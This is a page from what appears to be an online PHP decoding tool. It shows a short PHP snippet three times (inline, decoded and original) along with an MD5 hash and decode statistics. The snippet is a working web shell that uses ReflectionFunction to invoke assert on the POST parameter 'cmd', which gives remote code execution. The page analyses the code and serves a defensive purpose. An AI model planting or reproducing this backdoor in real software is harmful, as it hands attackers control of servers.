Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $s = new ReflectionFunction("assert"); @$s -> invoke($_POST["cmd"]); ?>..

Decoded Output download

<?php  
$s = new ReflectionFunction("assert"); 
@$s -> invoke($_POST["cmd"]); 
?>

Did this file decode correctly?

Original Code

<?php 
$s = new ReflectionFunction("assert");
@$s -> invoke($_POST["cmd"]);
?>

Function Calls

None

Variables

None

Stats

MD5 192a395727291dedbf8ecdda4ffcd038
Eval Count 0
Decode Time 137 ms